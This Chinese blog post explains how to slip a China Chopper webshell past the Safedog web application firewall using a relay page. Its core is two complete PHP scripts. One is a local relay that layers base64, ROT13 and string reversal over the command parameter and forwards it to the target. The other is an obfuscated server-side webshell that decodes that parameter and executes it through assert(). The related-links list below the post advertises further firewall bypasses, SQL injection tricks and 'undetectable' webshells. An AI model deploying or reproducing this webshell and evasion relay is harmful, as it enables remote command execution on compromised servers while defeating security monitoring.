绕过安全狗_中转Webshell 绕过安全狗(一)

最新推荐文章于 2024-02-16 20:00:00 发布
最新推荐文章于 2024-02-16 20:00:00 发布
阅读量237 收藏
点赞数
文章标签: 绕过安全狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39838328/article/details/112575782
版权

53c41c89061e9dd8267969a5b95fa2bb.gif

前言

听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理

菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shell,shell接收后用同样的算法进行解密,执行命令。

客户端

本地127.0.0.1,安装phpstudytransfer.php

<?php     function encode($str){    $DS = base64_encode($str);    $DS = str_rot13($DS);//ROT13编码    $DS = strrev($DS);//反转    $DS = base64_encode($DS);    return $DS;    }    // webshell地址,transServ.php为定制一句话    $webshell = 'http://192.168.253.129/waf/transServ.php';    $pdata = $_POST;//接受所有POST数据,数组    //var_dump($pdata);    foreach($pdata as $key=>$value){         //echo $value;        if(is_array($value)){            $value=implode($value);//数组组合为字符串        }        // 菜刀密码        if($key == 'x') {            //var_dump($pdata[$key]);            $pdata[$key] = encode($value);//encode编码            //echo $pdata[$key];        }            }    $data = http_build_query($pdata);//模拟http请求的,把得到的数据data通过函数URL-encode请求    //var_dump($data);//str字符串    $opts = array (        'http' => array (        'method' => 'POST',        'header'=> "Content-type: application/x-www-form-urlencoded\r\n" . "Content-Length: " . strlen($data) . "\r\n",        'content' => $data)    );    $context = stream_context_create($opts);    //模拟post、get请求,创建资源流上下文,数据包    $html = @file_get_contents($webshell, false, $context);    echo $html;?>

服务端

192.168.253.129,安装安全狗transServ.php

<?php  $DS = @$/*-*/{"_P"."OST"}['x'];//echo $DS;if (!empty($DS) ){    echo $DS."
";    $DS = @base64_decode($DS);    echo $DS."
";    $DS = @strrev($DS);    echo $DS."
";    $DS = @str_rot13($DS);    echo $DS."
";    $DS = @base64_decode($DS);    $a=explode(" ", $DS);    //var_dump($a);    echo assert($a[0]);    exit;}

操作

本地中国菜刀连接http://127.0.0.1/transfer.php   密码:x

c2e199e2c76c7742a77f8dbe20c821b2.png

8ea398036b3a699bfd586b620d878b8e.png

4ee36bb053a23ab6cb88db2522d6b8a2.gif

weixin_39838328
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux操作系统的服务器安全防护软件,从驱动层直接屏蔽攻击,保护服务器安全。自2011年推向市场后,迅速在服务器安全市场里占有一席之地。 这篇文档总结了一些安全狗上传绕过经验,供参考。
中转Webshell 绕过安全狗(一)
weixin_30311605的博客
06-21 184
前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shellshell接收后用同样的算法进行解密,执行命令。 客户...
Webshell如何bypass安全狗,D盾
蚁景网安学院
01-17 278
↑ 点击上方“合天智汇”关注我们01 前言相信各位师傅都有自己过waf一句话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的git...
中转Webshell 绕过安全狗(二)
weixin_30800807的博客
06-21 201
前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。 客户端 本地127.0.0.1,安装python2phpshellproxy.py #coding=utf-8 import sys reload(sys) sys.setdefaultencoding('utf-...
2016最新php免杀webshell安全狗
03-05
【2016年的测试】:描述中提到这个Webshell在2016年经过测试可以成功绕过安全狗,这可能是因为当时的安全狗检测规则相对简单,或者这个Webshell采用了当时较为新颖的免杀技术。 【文件名称列表】:只有一个名为...
2016最新aspx免杀webshell安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
安全狗的aspx一句话webshell
02-08
安全狗的aspx一句话webshell 纯CS模式,经典免杀
安全狗asp大马拿webshell 第一美人
04-21
2013年最新的asp大马。功能最强大的asp大马。可过安全狗。防删除隐藏,第一美人asp大马下载
怎么过安全狗
08-28
2013年唯一一款可以完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工 具的WEBSHELL. 秒杀全球杀毒软件,秒杀全球防火墙.不多做解释,尽在 RedHatWebshell... 大马不带密码,小马密码admin,自带...
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
提权大马 秒杀安全狗 无后门 权限强大
01-05
asp 提权大马 秒杀安全狗 无后门 权限强大
绕过安全狗
weixin_45923850的博客
07-20 1105
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
安全狗绕过
最新发布
jxy158212的博客
02-16 354
对于sql注入漏洞,针对安全狗绕过
安全狗绕过
alien0011的博客
06-09 3457
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1768
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5056
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
sqlmap之绕过安全狗
qq_50854662的博客
01-05 6081
sqlmap之绕过安全狗
绕过安全狗_绕过安全狗五步法
weixin_28810909的博客
12-24 707
今天分享绕过安全狗的方法,各位帽子兄弟研阅。PS:测试请断网,据说log会上传,哈哈熟悉的页面,没错绕过它,核心方法:Mysql注释绕过环境:001 利用数据回显获取用户信息找出回显字段http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)http://127.0.0.1/killdog/dog...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值